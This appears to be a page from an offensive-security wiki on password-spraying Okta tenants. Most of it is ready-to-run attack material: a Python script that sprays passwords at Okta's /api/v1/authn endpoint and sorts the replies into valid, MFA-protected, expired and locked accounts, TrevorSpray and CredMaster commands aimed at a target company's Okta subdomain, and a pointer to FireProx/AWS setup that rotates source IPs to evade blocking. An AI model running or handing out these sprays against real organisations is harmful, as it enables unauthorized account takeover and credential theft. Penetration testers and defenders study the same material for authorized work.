# Okta

### Password Spraying

Password spraying Okta is no harder than spraying any other service. Visibility is the harder problem: Okta does not normally tell the client that an account has been locked out, so an attempt against a locked account looks the same as a wrong password. For that reason, configure your spray tooling conservatively (long waits between password rounds, well under the tenant's lockout threshold) so the spray does not lock out users and cause business disruption.
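The visibility problem above comes down to reading the raw Okta Authentication API (`/api/v1/authn`) responses rather than the sign-in page. The block below is an added example, not code from this page, TrevorSpray or CredMaster: it classifies `/authn` replies into spray verdicts and runs one password round that stops as soon as a lockout or rate limit becomes visible. The tenant name `example-tenant`, the user list and the canned responses are constructed for offline use; a real run would swap `canned_post` for the `urllib_post` transport.

```python
"""Added example (not from the page, TrevorSpray or CredMaster): classify raw
Okta /api/v1/authn responses and run one spray round that halts on the first
visible lockout or rate limit. Tenant, users and replies are constructed."""
import json
import time
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

# A transport takes (url, json payload) and returns (http_status, body_text).
Transport = Callable[[str, dict], Tuple[int, str]]


def classify_authn_response(http_status: int, body: str) -> str:
    """Map an /authn reply to a spray verdict.

    Documented transaction states on HTTP 200: SUCCESS (no MFA), MFA_REQUIRED /
    MFA_ENROLL (password correct, factor needed), PASSWORD_EXPIRED /
    PASSWORD_WARN (password correct but must be changed) and LOCKED_OUT.
    A wrong password is HTTP 401 with errorCode E0000004. Tenants that do not
    expose lockout failures return that same 401 for a locked account, so an
    INVALID verdict may hide a lockout; that is why pacing stays conservative.
    """
    if http_status == 429:
        return "RATE_LIMITED"
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return "UNKNOWN"
    if http_status == 200:
        state = data.get("status")
        if state == "SUCCESS":
            return "VALID"
        if state in ("MFA_REQUIRED", "MFA_ENROLL"):
            return "VALID_MFA"
        if state in ("PASSWORD_EXPIRED", "PASSWORD_WARN"):
            return "VALID_EXPIRED"
        if state == "LOCKED_OUT":
            return "LOCKED_OUT"
        return "UNKNOWN"
    if http_status == 401 and data.get("errorCode") == "E0000004":
        return "INVALID"
    return "UNKNOWN"


def spray_round(tenant: str, users: List[str], password: str, post: Transport,
                delay: float = 0.0,
                stop_on=("LOCKED_OUT", "RATE_LIMITED")) -> Dict[str, str]:
    """Try one password against every user, sleeping `delay` seconds between
    requests. The round aborts on the first verdict in `stop_on` so a visible
    lockout pauses the spray instead of burning the rest of the user list."""
    url = f"https://{tenant}.okta.com/api/v1/authn"
    verdicts: Dict[str, str] = {}
    for i, user in enumerate(users):
        if i and delay:
            time.sleep(delay)
        status, body = post(url, {"username": user, "password": password})
        verdict = classify_authn_response(status, body)
        verdicts[user] = verdict
        if verdict in stop_on:
            break
    return verdicts


def urllib_post(url: str, payload: dict) -> Tuple[int, str]:
    """Stdlib transport for a real run (not exercised offline)."""
    req = urllib.request.Request(
        url, data=json.dumps(payload).encode(), method="POST",
        headers={"Content-Type": "application/json", "Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


# Constructed replies standing in for a target tenant (no real data).
CANNED: Dict[str, Tuple[int, str]] = {
    "alice@example.com": (200, json.dumps({"status": "MFA_REQUIRED", "stateToken": "00redacted"})),
    "bob@example.com": (401, json.dumps({"errorCode": "E0000004", "errorSummary": "Authentication failed"})),
    "carol@example.com": (200, json.dumps({"status": "LOCKED_OUT"})),
    "dave@example.com": (401, json.dumps({"errorCode": "E0000004", "errorSummary": "Authentication failed"})),
}


def canned_post(url: str, payload: dict) -> Tuple[int, str]:
    """Offline transport: looks the user up in CANNED instead of calling Okta."""
    return CANNED.get(payload["username"], (401, json.dumps({"errorCode": "E0000004"})))


def demo() -> Dict[str, str]:
    """One round against the constructed tenant; dave is never tried because
    carol's visible lockout stops the round."""
    return spray_round("example-tenant", list(CANNED), "Winter2024!", canned_post)


if __name__ == "__main__":
    for user, verdict in demo().items():
        print(f"{user:20} {verdict}")
```

Treat `INVALID` with suspicion on a tenant that hides lockouts: if a whole round returns nothing but `INVALID`, there is no way to distinguish wrong passwords from accounts you have already locked, which is the reason to keep rounds far apart rather than to trust the absence of `LOCKED_OUT`.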

#### Spraying Okta with TrevorSpray

```bash
# Installation
pip install git+https://github.com/blacklanternsecurity/trevorproxy
pip install git+https://github.com/blacklanternsecurity/trevorspray

# Password Spraying
trevorspray -m okta -u $users -p $password
```

{% hint style="info" %}
After you run the command above, TrevorSpray prompts for the Okta subdomain of the company you are targeting (the `$company` part of `$company.okta.com`). This should already have been identified during the reconnaissance phase; it is usually the company name.
{% endhint %}

#### Spraying Okta with CredMaster

```bash
# https://github.com/knavesec/CredMaster
# The plugin name selects the Okta module; the Okta plugin also takes the
# target tenant URL via --url. -a is the user-agent file, --config the
# FireProx/AWS config.
python3 credmaster.py --plugin okta --url https://$company.okta.com -u $users -p $passwords -a $useragents --config $config
```

CredMaster requires AWS access keys to set up FireProx, which rotates the source IP of each request through AWS API Gateway. The following guide covers configuring the required IAM permissions and starting the spray:

{% embed url="<https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b>" %}
